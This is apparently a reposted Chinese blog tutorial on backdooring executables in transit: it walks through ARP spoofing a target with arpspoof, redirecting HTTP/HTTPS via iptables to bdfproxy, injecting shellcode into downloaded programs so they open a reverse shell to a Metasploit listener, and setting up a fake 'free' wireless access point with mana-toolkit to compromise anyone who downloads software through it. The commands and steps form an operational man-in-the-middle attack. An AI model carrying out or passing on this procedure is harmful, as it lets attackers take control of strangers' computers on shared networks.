zoukankan      html  css  js  c++  java
  • Bdfproxy

    基于流量劫持动态注入shellcode

    本机IP:192.168.1.113

    靶机IP:192.168.1.114

    先安装bdfproxy,mitmproxy,backdoor_factory

    开启流量转发

    sysctl -w net.ipv4.ipv4.ip_forward=1

    重定向流量到8080端口

    iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-ports 8080

    查看是否设置成功

    修改配置文件

    vi /etc/bdfproxy/bdfproxy.cfg

    修改代理模式

    把所有的侦听IP地址都修改为本机IP,配合搜索/192.168

    修改完之后,保存

    启动bdfproxy

    会生成一个.rc脚本文件

    初始化msf数据库

    启动msfconsole,开始侦听

    jobs 查看侦听端口

    对目标主机进行ARP欺骗

    arpspoof -i eth0 -t <目标IP> <网关IP>

    靶机上网下载一个可执行程序

    这个下载好的程序其实已经被注入了shellcode

    双击执行它时,就会反弹一个shell给攻击机,查看session并进入shell

    配合mana建立无线路由器注入shellcode

    安装mana

    apt-get install mana-toolkit

    reboot重启

    停掉openvas

    修改配置文件

    修改无线路由名ssid

    复制一个启动脚本

    修改启动脚本

    修改无线网卡为本机使用的网卡

     删除这几条规则

     

    增加两条规则

    iptables -t nat -A PREROUTING -p tcp --dport 80-j REDIRECT --to-ports 8080

    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

    保存

    启动流量转发

    像上面的操作,修改配置,启动bdfproxy

    启动mana

    ./mana

    启动之后,其他人就会看到这个无线路由器,看似是一个免费的路由器

     

    有机器连接到这个路由下载软件时,就会在下载的软件中注入shell,当运行这个软件时就会被控制。

  • 相关阅读:
    工作总结_JS_1
    工作总结_js
    图片上传_及时显示
    js_截取Url值
    工作总结_sql
    Django项目配置xadmin 无法加载主题切换功能
    pip安装库慢问题解决方法
    Python模块Scrapy导入出错:ImportError: cannot import name xmlrpc_client
    python读取文件解码失败
    pycharm 修改新建文件时的头部模板
  • 原文地址:https://www.cnblogs.com/zylq-blog/p/6768497.html
Copyright © 2011-2022 走看看